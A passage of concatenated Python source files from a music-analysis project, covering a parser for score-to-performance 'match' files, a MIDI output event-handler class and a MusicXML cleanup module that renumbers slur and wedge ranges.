#pattern = 'snote\((.+),\[(.+),(.+)\],(.+),(.+):(.+),(.+),(.+),(.+),(.+),\[(.*)\]\)'
pattern = 'snote\(([^,]+),\[([^,]+),([^,]+)\],([^,]+),([^,]+):([^,]+),([^,]+),([^,]+),([^,]+),([^,]+),\[(.*)\]\)'
re_obj = re.compile(pattern)
def __init__(self, m = None):
if m != None:
MatchLine.__init__(self,m)
self.DurationSymbolic = m.groups()[7]
self.ScoreAttributesList = self.ScoreAttributesList.split(',')
@cached_property
def DurationInBeats(self):
return self.OffsetInBeats -self.OnsetInBeats
@cached_property
def MidiPitch(self):
return pitch_name_2_midi_PC(self.Modifier, self.NoteName, self.Octave)
class InfoLine(MatchLine):
"""
Class representing an Info line
"""
field_names = ['Attribute','Value']
pattern = 'info\(\s*([^,]+)\s*,\s*(.+)\s*\)\.'
re_obj = re.compile(pattern)
class MetaLine(MatchLine):
"""
Class representing a Meta line
"""
field_names = ['Attribute','Value','Bar','TimeInBeats']
pattern = 'meta\(\s*([^,]*)\s*,\s*([^,]*)\s*,\s*([^,]*)\s*,\s*([^,]*)\s*\)\.'
re_obj = re.compile(pattern)
class SustainPedalLine(MatchLine):
"""
Class representing a sustain pedal line
"""
field_names = ['Time','Value']
pattern = 'sustain\(\s*([^,]*)\s*,\s*([^,]*)\s*\)\.'
re_obj = re.compile(pattern)
class SoftPedalLine(MatchLine):
"""
Class representing a soft pedal line
"""
field_names = ['Time','Value']
pattern = 'soft\(\s*([^,]*)\s*,\s*([^,]*)\s*\)\.'
re_obj = re.compile(pattern)
class SnoteNoteLine(MatchLine):
"""
Class representing a "match" (containing snote and note)
"""
pattern = Snote.pattern+'-'+Note.pattern
re_obj = re.compile(pattern)
def __init__(self,m1,m2):
self.snote = Snote(m1)
self.note = Note(m2)
class SnoteDeletionLine(MatchLine):
"""
Class representing the deletion of an snote
"""
field_names = Snote.field_names
pattern = Snote.pattern+'-deletion\.' # unused for efficiency reasons
re_obj = re.compile(pattern)
def __init__(self, m1):
self.snote = Snote(m1)
class InsertionNoteLine(MatchLine):
# field_names = Note.field_names
field_names = []
pattern = 'insertion-'+Note.pattern # unused for efficiency reasons
re_obj = re.compile(pattern)
def __init__(self, m2):
self.note = Note(m2)
class HammerBounceNoteLine(MatchLine):
field_names = Note.field_names
pattern = 'hammer_bounce-'+Note.pattern # unused for efficiency reasons
re_obj = re.compile(pattern)
def __init__(self, m2):
self.note = Note(m2)
class OrnamentNoteLine(MatchLine):
field_names = Note.field_names
pattern = 'ornament\([^\)]*\)-'+Note.pattern # unused for efficiency reasons
re_obj = re.compile(pattern)
def __init__(self, m2):
self.note = Note(m2)
class TrillNoteLine(MatchLine):
field_names = Note.field_names
pattern = 'trill\([^\)]*\)-'+Note.pattern # unused for efficiency reasons
re_obj = re.compile(pattern)
def __init__(self, m2):
self.note = Note(m2)
class SnoteTrailingLine(MatchLine):
field_names = ['Anchor','NoteName','Modifier','Octave',
'Bar','Beat','Offset','Duration',
'OnsetInBeats','OffsetInBeats','ScoreAttributesList']
pattern = 'snote\((.+),\[(.+),(.+)\],(.+),(.+):(.+),(.+),(.+),(.+),(.+),\[(.*)\]\)'
re_obj = re.compile(pattern)
def __init__(self,m):
self.snote = Snote(m)
class SnoteOnlyLine(MatchLine):
field_names = ['Anchor','NoteName','Modifier','Octave',
'Bar','Beat','Offset','Duration',
'OnsetInBeats','OffsetInBeats','ScoreAttributesList']
pattern = 'snote\((.+),\[(.+),(.+)\],(.+),(.+):(.+),(.+),(.+),(.+),(.+),\[(.*)\]\)'
re_obj = re.compile(pattern)
def __init__(self, m):
self.snote = Snote(m)
class MatchFile(object):
"""
Class for representing MatchFiles. It is instantiated by giving
the filename of a Match file
"""
def __init__(self, filename):
"""
Read the contents of a Match file `filename`
:param filename: filename of a match file
"""
fileData = [l.decode('utf8').strip() for l in open(filename,'rb')]
self.name = filename
self.voiceIdxFile = []
# the lines of the file, represented as MatchLine objects
self.lines = np.array([self.parse_matchline(l) for l in fileData])
@cached_property
def _info(self):
"""
Return all InfoLine objects
"""
return [i for i in self.lines if isinstance(i,InfoLine)]
def info(self, attribute = None):
"""
Return the value of the InfoLine object corresponding to
attribute, or None if there is no such object
:param attribute: the name of the attribute to return the value for
"""
if attribute:
try:
idx = [i.Attribute for i in self._info].index(attribute)
return self._info[idx].Value
except:
return None
else:
return self._info
@cached_property
def sustain_lines(self):
"""
Return all sustain pedal lines
"""
return [i for i in self.lines if isinstance(i,SustainPedalLine)]
@cached_property
def soft_lines(self):
"""
Return all soft pedal lines
"""
return [i for i in self.lines if isinstance(i,SoftPedalLine)]
@cached_property
def note_pairs(self):
"""
Return all (snote, note) tuples
"""
return [(x.snote, x.note) for x in self.lines if isinstance(x, SnoteNoteLine)]
def lines_at_score_times(self, times):
"""
Return all lines with snotes that span any value t in the array `times`
:param times: array of floats
:returns: a list of MatchLine objects for each value t in `times`
"""
snoteLines = [l for l in self.lines if hasattr(l,'snote')]
onoffsets = np.array([(l.snote.OnsetInBeats,l.snote.OffsetInBeats) for l in snoteLines],
dtype=np.dtype([('onset',np.float),('offset',np.float)]))
lidx = np.argsort(onoffsets,order=('onset','offset'))
tidx = np.argsort(times)
i = 0
i_min = 0
result = []
for t in times[tidx]:
r = []
ii = []
i = i_min
while i < len(lidx) and not (onoffsets['onset'][lidx[i]] > t and onoffsets['offset'][lidx[i]] > t):
if (onoffsets['onset'][lidx[i]] <= t and onoffsets['offset'][lidx[i]] > t):
r.append(lidx[i])
ii.append(i)
i += 1
if len(ii) > 0:
i_min = ii[0]
result.append(r)
return [[snoteLines[x] for x in notes] for notes in result]
@cached_property
def first_onset(self):
"""
The earliest snote onset in the file
"""
self.snote_idx()
if len(self.snoteIdx) == 0:
return None
else:
return self.lines[self.snoteIdx[0]].snote.OnsetInBeats
@cached_property
def time_signatures(self):
"""
A list of tuples (t, (a, b)), indicating a time signature of a over b, starting at t
"""
tspat = re.compile('([0-9]+)/([0-9]*)')
m = [(int(x[0]),int(x[1])) for x in
tspat.findall(self.info('timeSignature'))]
timeSigs = []
if len(m) > 0:
timeSigs.append((self.first_onset, m[0]))
for l in self.time_sig_lines():
timeSigs.append((float(l.TimeInBeats),[(int(x[0]),int(x[1])) for x in tspat.findall(l.Value)][0]))
timeSigs = list(set(timeSigs))
timeSigs.sort(key=lambda x: x[0])
return timeSigs
def _time_sig_lines(self):
return [i for i in self.lines if
isinstance(i,MetaLine) and
hasattr(i,'Attribute') and
i.Attribute == 'timeSignature']
def time_sig_lines(self):
ml = self._time_sig_lines()
if len(ml) == 0:
ts = self.info('timeSignature')
ml = [self.parse_matchline('meta(timeSignature,{0},1,{1}).'.format(ts,self.first_onset()))]
return ml
def snote_idx(self):
"""
Return the line numbers that have snotes
"""
if hasattr(self,'snotes'):
return self.snoteIdx
else:
self.snoteIdx = [i for i,l in enumerate(self.lines)
if hasattr(l,'snote')]
return self.snoteIdx
def soprano_voice(self, return_indices = False):
"""
Return the snotes marked as soprano notes (excluding those
marked as grace notes)
:param return_indices: if True, return the line numbers of the
soprano notes, otherwise return the
corresponding MatchLines themselves
:returns: a list of line numbers, or MatchLine objects
"""
if return_indices:
return [i for i,l in enumerate(self.lines)
if hasattr(l,'snote') and
's' in l.snote.ScoreAttributesList and
not 'grace' in l.snote.ScoreAttributesList and
l.snote.Duration > 0.0]
else:
return [l for l in self.lines
if hasattr(l,'snote') and
's' in l.snote.ScoreAttributesList and
not 'grace' in l.snote.ScoreAttributesList
and l.snote.Duration > 0.0]
def highest_voice_without_indexfile(self, exclude_grace = True, return_indices = False):
"""
Return the highest snotes
:param exclude_grace: if True, leave out any grace notes (default: True)
:param return_indices: if True, return the line numbers of the soprano
notes, otherwise return the corresponding MatchLines
themselves (default: False)
:returns: a list of line numbers, or MatchLine objects
"""
sopr = self.soprano_voice(return_indices)
if len(sopr) > 0:
return(sopr)
def is_grace(note):
return 'grace' in note.ScoreAttributesList
def in_lower_staff(note):
return 'staff2' in note.ScoreAttributesList
idx = self.snote_idx()
features = []
for i,idx in enumerate(self.snoteIdx):
n = self.lines[idx].snote
if not (in_lower_staff(n)
or (exclude_grace and is_grace(n))
or n.Duration == 0.0):
features.append((n.OnsetInBeats,n.OffsetInBeats,n.MidiPitch[0],i))
features = np.array(features)
# sort according to pitch (highest first)
features = features[np.argsort(features[:,2])[::-1]]
# sort according to onset (smallest first)
features = features[np.argsort(features[:,0],kind='mergesort')]
voice = [features[0,:]]
for f in features:
# if onset is later_eq than last voice offset, add next note
if f[0] >= voice[-1][1]:
voice.append(f)
# indices into the list of snotes
indices = np.array(np.array(voice)[:,3],np.int)
if return_indices:
return np.array(self.snoteIdx)[indices]
else:
#return [m for i,m in enumerate(self.lines[self.snoteIdx]) if i in indices]
return [l for l in self.lines[self.snoteIdx][indices]]
def parse_matchline(self,l):
"""
Return objects representing the line as one of:
* hammer_bounce-PlayedNote.
* info(Attribute, Value).
* insertion-PlayedNote.
* ornament(Anchor)-PlayedNote.
* ScoreNote-deletion.
* ScoreNote-PlayedNote.
* ScoreNote-trailing_score_note.
* trailing_played_note-PlayedNote.
* trill(Anchor)-PlayedNote.
* meta(Attribute,Value,Bar,Beat).
or False if none can be matched
"""
snoteMatch = Snote.match_pattern(l)
noteMatch = Note.match_pattern(l,pos = snoteMatch.end() if snoteMatch else 0)
if snoteMatch:
if noteMatch:
return SnoteNoteLine(snoteMatch,noteMatch)
else:
if re.compile('-deletion\.$').search(l,pos=snoteMatch.end()):
return SnoteDeletionLine(snoteMatch)
else:
if re.compile('-trailing_score_note\.$').search(l,pos=snoteMatch.end()):
return SnoteTrailingLine(snoteMatch)
else:
return SnoteOnlyLine(snoteMatch)
else: # no snoteMatch
if noteMatch:
if re.compile('^insertion-').search(l,endpos=noteMatch.start()):
return InsertionNoteLine(noteMatch)
elif re.compile('^trill\([^\)]*\)-').search(l,endpos=noteMatch.start()):
return TrillNoteLine(noteMatch)
elif re.compile('^ornament\([^\)]*\)-').search(l,endpos=noteMatch.start()):
return OrnamentNoteLine(noteMatch)
elif re.compile('^trailing_played_note-').search(l,endpos=noteMatch.start()):
return TrailingNoteLine(noteMatch)
elif re.compile('^hammer_bounce-').search(l,endpos=noteMatch.start()):
return HammerBounceNoteLine(noteMatch)
else:
return False
else:
metaMatch = MetaLine.match_pattern(l)
if metaMatch:
return MetaLine(metaMatch,lambda x: x)
else:
infoMatch = InfoLine.match_pattern(l)
if infoMatch:
return InfoLine(infoMatch,
field_interpreter = interpret_field)
else:
sustainMatch = SustainPedalLine.match_pattern(l)
if sustainMatch:
return SustainPedalLine(sustainMatch, field_interpreter = interpret_field)
else:
softMatch = SoftPedalLine.match_pattern(l)
if softMatch:
return SoftPedalLine(softMatch, field_interpreter = interpret_field)
else:
#return UnknownMatchLine(l)
return False
if __name__ == '__main__':
pass
```
#### File: data_handling/midi_backend/MidiOutStream.py
```python
class MidiOutStream:
"""
MidiOutstream is Basically an eventhandler. It is the most central
class in the Midi library. You use it both for writing events to
an output stream, and as an event handler for an input stream.
This makes it extremely easy to take input from one stream and
send it to another. Ie. if you want to read a Midi file, do some
processing, and send it to a midiport.
All time values are in absolute values from the opening of a
stream. To calculate time values, please use the MidiTime and
MidiDeltaTime classes.
"""
def __init__(self):
# the time is rather global, so it needs to be stored
# here. Otherwise there would be no really simple way to
# calculate it. The alternative would be to have each event
# handler do it. That sucks even worse!
self._absolute_time = 0
self._relative_time = 0
self._current_track = 0
self._running_status = None
# time handling event handlers. They should be overwritten with care
def update_time(self, new_time=0, relative=1):
"""
Updates the time, if relative is true, new_time is relative,
else it's absolute.
"""
if relative:
self._relative_time = new_time
self._absolute_time += new_time
else:
self._relative_time = new_time - self._absolute_time
self._absolute_time = new_time
def reset_time(self):
"""
reset time to 0
"""
self._relative_time = 0
self._absolute_time = 0
def rel_time(self):
"Returns the relative time"
return self._relative_time
def abs_time(self):
"Returns the absolute time"
return self._absolute_time
# running status methods
def reset_run_stat(self):
"Invalidates the running status"
self._running_status = None
def set_run_stat(self, new_status):
"Set the new running status"
self._running_status = new_status
def get_run_stat(self):
"Set the new running status"
return self._running_status
# track handling event handlers
def set_current_track(self, new_track):
"Sets the current track number"
self._current_track = new_track
def get_current_track(self):
"Returns the current track number"
return self._current_track
#####################
## Midi events
def channel_message(self, message_type, channel, data):
"""The default event handler for channel messages"""
pass
def note_on(self, channel=0, note=0x40, velocity=0x40):
"""
channel: 0-15
note, velocity: 0-127
"""
pass
def note_off(self, channel=0, note=0x40, velocity=0x40):
"""
channel: 0-15
note, velocity: 0-127
"""
pass
def aftertouch(self, channel=0, note=0x40, velocity=0x40):
"""
channel: 0-15
note, velocity: 0-127
"""
pass
def continuous_controller(self, channel, controller, value):
"""
channel: 0-15
controller, value: 0-127
"""
pass
def patch_change(self, channel, patch):
"""
channel: 0-15
patch: 0-127
"""
pass
def channel_pressure(self, channel, pressure):
"""
channel: 0-15
pressure: 0-127
"""
pass
def pitch_bend(self, channel, value):
"""
channel: 0-15
value: 0-16383
"""
pass
#####################
## System Exclusive
def system_exclusive(self, data):
"""
data: list of values in range(128)
"""
pass
#####################
## Common events
def song_position_pointer(self, value):
"""
value: 0-16383
"""
pass
def song_select(self, songNumber):
"""
songNumber: 0-127
"""
pass
def tuning_request(self):
"""
No values passed
"""
pass
def midi_time_code(self, msg_type, values):
"""
msg_type: 0-7
values: 0-15
"""
pass
#########################
# header does not really belong here. But anyhoo!!!
def header(self, format=0, nTracks=1, division=96):
"""
Parameters
-----------
format : number, optional. Default: 0
the type of MIDI file, possible is: 0, 1, 2
nTracks : number, optional. Default: 1
the number of tracks
division : number, optional. Default: 96
the timing division
# format: type of midi file in [1,2]
# nTracks: number of tracks
# division: timing division
"""
pass
def eof(self):
"""
End of file. No more events to be processed.
"""
pass
#####################
## meta events
def meta_event(self, meta_type, data):
"""
Handles any undefined meta events
"""
pass
def start_of_track(self, n_track=0):
"""
n_track: number of track
"""
pass
def end_of_track(self):
"""
n_track: number of track
"""
pass
def sequence_number(self, value):
"""
value: 0-16383
"""
pass
def text(self, text):
"""
Text event
text: string
"""
pass
def copyright(self, text):
"""
Copyright notice
text: string
"""
pass
def sequence_name(self, text):
"""
Sequence/track name
text: string
"""
pass
def instrument_name(self, text):
"""
text: string
"""
pass
def lyric(self, text):
"""
text: string
"""
pass
def marker(self, text):
"""
text: string
"""
pass
def cuepoint(self, text):
"""
text: string
"""
pass
def midi_ch_prefix(self, channel):
"""
channel: midi channel for subsequent data (deprecated in the spec)
"""
pass
def midi_port(self, value):
"""
value: Midi port (deprecated in the spec)
"""
pass
def tempo(self, value):
"""
Parameters
----------
value : number
the tempo in microseconds / quarternote.
Possible values: 0-2097151
Calculate value from bpm (needs to be quarters per minute?!):
value = int(60,000,000.00 / BPM)
# value: 0-2097151
# tempo in us/quarternote
# (to calculate value from bpm: int(60,000,000.00 / BPM))
"""
pass
def smtp_offset(self, hour, minute, second, frame, framePart):
"""
hour,
minute,
second: 3 bytes specifying the hour (0-23), minutes (0-59) and
seconds (0-59), respectively. The hour should be
encoded with the SMPTE format, just as it is in MIDI
Time Code.
frame: A byte specifying the number of frames per second (one
of : 24, 25, 29, 30).
framePart: A byte specifying the number of fractional frames,
in 100ths of a frame (even in SMPTE-based tracks
using a different frame subdivision, defined in the
MThd chunk).
"""
pass
def time_signature(self, nn, dd, cc, bb):
"""
nn: Numerator of the signature as notated on sheet music
dd: Denominator of the signature as notated on sheet music
The denominator is a negative power of 2: 2 = quarter
note, 3 = eighth, etc.
cc: The number of MIDI clocks in a metronome click
bb: The number of notated 32nd notes in a MIDI quarter note
(24 MIDI clocks)
"""
pass
def key_signature(self, sf, mi):
"""
sf: is a byte specifying the number of flats (-ve) or sharps
(+ve) that identifies the key signature (-7 = 7 flats, -1
= 1 flat, 0 = key of C, 1 = 1 sharp, etc).
mi: is a byte specifying a major (0) or minor (1) key.
"""
pass
def sequencer_specific(self, data):
"""
data: The data as byte values
"""
pass
#####################
## realtime events
def timing_clock(self):
"""
No values passed
"""
pass
def song_start(self):
"""
No values passed
"""
pass
def song_stop(self):
"""
No values passed
"""
pass
def song_continue(self):
"""
No values passed
"""
pass
def active_sensing(self):
"""
No values passed
"""
pass
def system_reset(self):
"""
No values passed
"""
pass
if __name__ == '__main__':
midiOut = MidiOutStream()
midiOut.update_time(0, 0)
midiOut.note_on(0, 63, 127)
midiOut.note_off(0, 63, 127)
```
#### File: extra/data_handling/musicxmlcleaning.py
```python
import re
import numpy as np
from lxml import etree
from collections import Counter, defaultdict, OrderedDict
from operator import itemgetter
import logging
logging.basicConfig(level=logging.INFO)
LOGGER = logging.getLogger(__name__)
CHILD_ORDER = {'//pitch': ['step', 'alter', 'octave'],
'//score-partwise': ['work', 'movement-number', 'movement-title',
'identification', 'defaults', 'credit',
'part-list', 'part'],
'//work': ['work-number', 'work-title', 'opus'],
'//direction': ['direction-type', 'offset', 'footnote', 'level',
'voice', 'staff', 'sound'],
'//barline': ['bar-style', 'footnote', 'level', 'wavy-line',
'segno', 'coda', 'fermata', 'ending', 'repeat'],
'//identification': ['creator', 'rights', 'encoding', 'source',
'relation, miscellaneous'],
'//attributes': ['divisions', 'key', 'time', 'staves', 'part-symbol',
'instruments', 'clef', 'staff-details', 'transpose',
'directive', 'measure-style'],
# TODO: add note child order (tricky, because can be different,
# depending presence/absence of children)
}
# min max numbers allowed in number attribute of slurs, wedges, dashes, etc
MIN_RANGE = 1
MAX_RANGE = 6
class Colors(object):
"""Escape codes for color in logging
"""
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
def get_elements_by_position(measures, target):
"""
Return a dictionary indexed by position (in `divisions`), where each
position key returns a list of elements matching xpath expression `target`
at that position in the MusicXML file. `measures`.
"""
pos = 0
result = defaultdict(list)
for m in measures:
for e in m:
result[pos].extend(e.xpath(target))
dur = 0
if len(e.xpath('./chord[1]')) == 0:
try:
dur = int(e.xpath('./duration[1]/text()')[0])
except IndexError:
pass
if e.tag == 'backup':
dur = -dur
pos += dur
for k, v in result.items():
if len(v) == 0:
del result[k]
return dict(result)
def fix_order(doc, xpath, order=None):
"""
Fix the order of children in elements returned by `doc`.xpath(`xpath`). The
order of the children is given by a dictionary order with element tags as
keys, and a sorting number as value. Elements whose tags are not in `order`
are placed at the end in the order of original occurrence.
"""
if order is None:
order = CHILD_ORDER.get(xpath, {})
if not isinstance(order, dict):
order = dict(zip(order, range(len(order))))
elements = doc.xpath(xpath)
for e in elements:
e[:] = sorted(e, key=lambda x: order.get(x.tag, len(order)))
def fix_direction(doc):
"""
Directions need a direction-type element. This function looks for directions
that have no direction-type and if they have a sound element, tries to infer
a direction-type from the attributes of the sound element. If no
direction-type can be inferred, an Exception is raised.
"""
directions = doc.xpath('//direction')
to_dt = {'dacapo': dict(type='words', text='da capo'),
'fine': dict(type='words', text='fine'),
'segno': dict(type='segno'),
'coda': dict(type='coda')
}
for d in directions:
childtags = [e.tag for e in d]
has_dt = 'direction-type' in childtags
try:
sound_idx = childtags.index('sound')
except ValueError:
continue
if not has_dt:
dts = set.intersection(set(to_dt.keys()),
set(d[sound_idx].attrib.keys()))
if len(dts) > 0:
for w in dts:
dt = etree.Element('direction-type')
e = etree.Element(to_dt[w]['type'])
if 'text' in to_dt[w]:
e.text = to_dt[w]['text']
dt.append(e)
d.append(dt)
else:
raise Exception("Do not know how to deal with direction without direction-type (children: {})"
.format(childtags))
# chtagset = set(childtags).difference(set(('offset', 'staff', 'sound'
# 'footnote', 'level', 'voice')))
# if len(chtagset)
# s = d[sound_idx]
# d.remove(s)
# p = d.getparent()
# p.insert(p.index(d), s)
# p.remove(d)
def get_position_info(e, return_dict=False):
"""
Build a string that provides position information for the element, only
intended for manual inspection.
"""
# TODO, don't assume e is inside a measure
m = [x for x in e.iterancestors() if x.tag == 'measure'][0]
note = [x for x in e.iterancestors() if x.tag == 'note']
if len(note) > 0:
noteinfo = ' (note id: {}; left/top: {:.0f} / {:.0f})'.format(
note[0].get('ID'),
float(note[0].xpath('coordinates/pixel/left')[0].text),
float(note[0].xpath('coordinates/pixel/top')[0].text))
else:
noteinfo = ''
if return_dict:
return dict(measure=m.get('number'), page=m.get('page'), system=m.get('system'))
else:
return ('measure number {}, page {}, system {}{}'
.format(m.get('number'), m.get('page'), m.get('system'),
noteinfo))
def try_compress_numbers_to_range(elements):
"""
Map the "number" attribute of any element in `elements` to the most compact
range possible (starting from 1). If the resulting numbers are within
[MIN_RANGE, MAX_RANGE], return True, otherwise, return False. If it is not
possible to obtain a mapping within [MIN_RANGE, MAX_RANGE], the number
attributes not modified.
"""
numbers = set(int(e.get('number')) for e in elements)
if len(numbers) <= ((MAX_RANGE - MIN_RANGE) + 1):
actual_nrs = sorted(numbers)
ideal_nrs = range(MIN_RANGE, MIN_RANGE + len(numbers))
if np.any(np.array(actual_nrs) != np.array(ideal_nrs)):
nr_map = dict(zip(actual_nrs, ideal_nrs))
LOGGER.debug(u'compressing number range {}'
.format(', '.join(u'{} → {}'.format(k, v) for k, v in nr_map.items())))
for e in elements:
old_nr = int(e.get('number'))
new_nr = nr_map[old_nr]
e.set('number', str(new_nr))
all_within_range = True
else:
all_within_range = False
return all_within_range
def get_first_non_blacklisted(blacklist):
"""Return the first integer not in `blacklist`.
"""
i = 1
while i in blacklist:
i += 1
return i
def get_note_ancestor(e):
"""
Return the first ancestor of `e` with tag "note", or None if there is no such
ancestor.
"""
for a in e.iterancestors():
if a.tag == 'note':
return a
return None
# def get_pitch(n):
# """
# """
# pitch = n.xpath('pitch')[0]
# return '{} {} {}'.format(''.join(pitch.xpath('step/text()')),
# ''.join(pitch.xpath('alter/text()')),
# ''.join(pitch.xpath('octave/text()')))
def remove_redundant_ranges(ebp, pbe):
matches, false_starts, false_stops = match_start_stop_elements(ebp)
be_note_pairs = defaultdict(list)
# be_pos_pairs = defaultdict(list)
for e_start, e_end in matches.items():
n_start = get_note_ancestor(e_start)
n_end = get_note_ancestor(e_end)
# if n_start and n_end and get_pitch(n_start) == get_pitch(n_end):
# print('tie?')
# be_pos_pairs[(pbe[e_start], pbe[e_end])].append(e_start)
be_note_pairs[(n_start, n_end)].append(e_start)
if (None, None) in be_note_pairs:
del be_note_pairs[(None, None)]
for ee in be_note_pairs.values():
if len(ee) > 1:
LOGGER.debug('removing {} redundant items'.format(len(ee) -1))
for e_start in ee[1:]:
e_start.getparent().remove(e_start)
e_end = matches[e_start]
e_end.getparent().remove(e_end)
def fix_start_stop_numbers(doc, xpath):
"""
Change the "number" attributes of elements matching `xpath` to lie within
the interval [MIN_RANGE, MAX_RANGE]. As opposed to the function
`try_compress_numbers_to_range` this function keeps track of which numbered
ranges are active, and reuses numbers if there are no ongoing ranges with
that number. It does not use numbers occurring in erroneous ranges (ranges
for which there are unmatched start or stop elements).
"""
measures = doc.xpath('.//measure')
ebp = get_elements_by_position(measures, xpath)
pbe = dict((e, p) for p, ee in ebp.items() for e in ee)
LOGGER.debug('mismatches before corrections:')
ebp = get_elements_by_position(measures, xpath)
pbe = dict((e, p) for p, ee in ebp.items() for e in ee)
check_mismatches(ebp)
# fn = '/tmp/{}_before.txt'.format(re.sub('\W', '', xpath))
# plot_ranges(ebp, fn)
remove_redundant_ranges(ebp, pbe)
# ebp = get_elements_by_position(measures, xpath)
# pbe = dict((e, p) for p, ee in ebp.items() for e in ee)
all_within_range = try_compress_numbers_to_range([e for ee in ebp.values()
for e in ee])
if all_within_range:
LOGGER.debug('{}all within range{}'.format(Colors.OKGREEN, Colors.ENDC))
return True
else:
LOGGER.debug('not all within range')
matches, false_starts, false_stops = match_start_stop_elements(ebp)
inv_matches = dict((v, k) for k, v in matches.items())
# print('false st/st', len(false_starts), len(false_stops))
blacklist = set([int(e.get('number', -1)) for e in
false_starts + false_stops
if MIN_RANGE <= int(e.get('number', -1)) <= MAX_RANGE])
LOGGER.debug('blacklist: {}'.format(blacklist))
active = defaultdict(set)
active_at_pos = {}
positions = np.array(sorted(ebp.keys()))
for p_np in positions:
p = int(p_np)
ee = sorted(ebp[p], key=lambda x: x.get('type'), reverse=True)
for e in ee:
n = int(e.get('number', -1))
t = e.get('type')
if t in ('start', 'crescendo', 'diminuendo'):
active[n].add(e)
elif t == 'stop':
try:
active[n].remove(inv_matches[e])
except KeyError:
pass
else:
raise Exception()
active_at_pos[p] = set(x for y in active.values() for x in y)
# for p in positions:
# active = active_at_pos[int(p)]
# if len(active) > 0:
# print('{}: {}'.format(int(p), [int(e.get('number')) for e in active]))
for b, e in matches.items():
n = int(b.get('number'))
if n in blacklist:
continue
start = pbe[b]
end = pbe[e]
span = positions[np.logical_and(positions >= start, positions < end)]
concurrent = set(int(x.get('number', -1)) for p in span
for x in active_at_pos[int(p)].difference(set((b,))))
blacklist_for_range = blacklist.union(concurrent)
new_n = get_first_non_blacklisted(blacklist_for_range)
if not MIN_RANGE <= new_n <= MAX_RANGE:
#LOGGER.warning('Cannot renumber start-stop into valid range',start, end, n, new_n, concurrent)
LOGGER.warning('Cannot renumber start-stop into valid range (orig. nr: {}; new nr: {}; co-occuring numbers: {})'.format(n, new_n, concurrent))
LOGGER.warning('Position: ' + get_position_info(b))
else:
if n != new_n:
LOGGER.debug(u'renumbering {} → {} (blacklisted: {})'.format(n, new_n, list(blacklist_for_range)))
# print(start, end, n, '->', new_n, blacklist_for_range)
b.set('number', str(new_n))
e.set('number', str(new_n))
LOGGER.debug('mismatches after corrections:')
ebp = get_elements_by_position(measures, xpath)
check_mismatches(ebp)
fn = '/tmp/{}_after.txt'.format(re.sub('\W', '', xpath))
plot_ranges(ebp, fn)
def check_mismatches(ebp):
"""
Check if there are any mis-matched range start/stop elements. Only for
informational purposes.
"""
matches, false_starts, false_stops = match_start_stop_elements(ebp)
pbe = dict((e, p) for p, ee in ebp.items() for e in ee)
false_start_by_nr = Counter()
false_stop_by_nr = Counter()
for e in false_starts:
false_start_by_nr.update((int(e.get('number', -1)),))
for e in false_stops:
false_stop_by_nr.update((int(e.get('number', -1)),))
nrs = set.union(set(false_start_by_nr.keys()),
set(false_stop_by_nr.keys()))
for n in nrs:
LOGGER.debug(u'{}number {} has {} false starts and {} false stops{}'.format(
Colors.FAIL, n, false_start_by_nr[n],
false_stop_by_nr[n], Colors.ENDC).encode('utf8'))
# counter = defaultdict(lambda: defaultdict(lambda: 0))
# for p in sorted(ebp.keys()):
# # sort elements by reverse lexical order of attribute type, to ensure
# # that "stop" elements are handled before "start" elements (nevermind
# # "diminuendo", "crescendo")
# for e in sorted(ebp[p], key=lambda x: x.get('type'), reverse=True):
# n = int(e.get('number', -1))
# t = e.get('type')
# counter[n][t] += 1
# for k, ss in counter.items():
# # print(k,ss['start'], ss['stop'])
# # if ss['start'] != ss['stop']:
# nstart = sum(ss[t] for t in ('start', 'diminuendo', 'crescendo'))
# if not nstart == ss['stop']:
# level = Colors.FAIL
# else:
# level = Colors.OKGREEN
# print(u'{}number {} has {} starts and {} stops{}'.format(
# level, k, nstart, ss['stop'], Colors.ENDC).encode('utf8'))
# def plot_ss(ebp, outfile, false_starts=[], false_stops=[]):
# symb = dict(start='<', stop='>')
# with open(outfile, 'w') as f:
# for p in sorted(ebp.keys()):
# for e in ebp[p]:
# n = int(e.get('number', -1))
# t = e.get('type')
# s = symb[t]
# f.write('{} {} {}\n'.format(p, n, s))
# def plot_ranges(ebp, outfile):
# symb = dict(start='<',
# crescendo='<',
# diminuendo='<',
# stop='>',
# false_start='X',
# false_stop='Y'
# )
# matches, false_starts, false_stops = match_start_stop_elements(ebp)
# # print('false starts', len(false_starts))
# # print('false stops', len(false_stops))
# pbe = dict((e, p) for p, ee in ebp.items() for e in ee)
# data = []
# active = defaultdict(list)
# n_active = {}
# for p in sorted(ebp.keys()):
# for e in sorted(ebp[p], key=lambda x: x.get('type'), reverse=True):
# n = int(e.get('number', -1))
# t = e.get('type')
# if t in ('start', 'crescendo', 'diminuendo'):
# active[n].append(e)
# elif t == 'stop':
# try:
# active[n].pop()
# except:
# pass
# else:
# raise Exception()
# n_active[p] = sum(len(x) for x in active.values())
# for s, e in matches.items():
# data.append((pbe[s], int(s.get('number')), symb[s.get('type')], n_active[pbe[s]]))
# data.append((pbe[e], int(e.get('number')), symb[e.get('type')], n_active[pbe[e]]))
# for s in false_starts:
# # print(pbe[s], get_position_info(s))
# data.append((pbe[s], int(s.get('number')), symb['false_start'], n_active[pbe[s]]))
# for s in false_stops:
# data.append((pbe[s], int(s.get('number')), symb['false_stop'], n_active[pbe[s]]))
# data.sort(key=itemgetter(0))
# with open(outfile, 'w') as f:
# for row in data:
# f.write('{} {} {} {}\n'.format(*row))
def match_start_stop_elements(ebp):
"""
Return a list of matching start/stop elements, as well as a list of
non-matched start and non-matched stop elements, occurring in the values of
dictionary `ebp` (as returned by `get_elements_by_position`).
"""
matches = {}
started = defaultdict(list)
false_starts = []
false_stops = []
for p in sorted(ebp.keys()):
# sort elements by reverse lexical order of attribute type, to ensure
# that "stop" elements are handled before "start" elements (nevermind
# "diminuendo", "crescendo")
for e in sorted(ebp[p], key=lambda x: x.get('type'), reverse=True):
n = int(e.get('number', -1))
t = e.get('type')
if t in ('start', 'crescendo', 'diminuendo'):
if len(started[n]) > 0:
# print('false start')
false_starts.append(e)
else:
started[n].append(e)
elif t == 'stop':
if len(started[n]) == 0:
# print('false stop')
false_stops.append(e)
else:
es = started[n].pop()
matches[es] = e
else:
raise
for ss in started.values():
false_starts.extend(ss)
return matches, false_starts, false_stops
```
#### File: extra/data_handling/scoreontology.py
```python
import sys
import string
import re
from copy import copy
import numpy as np
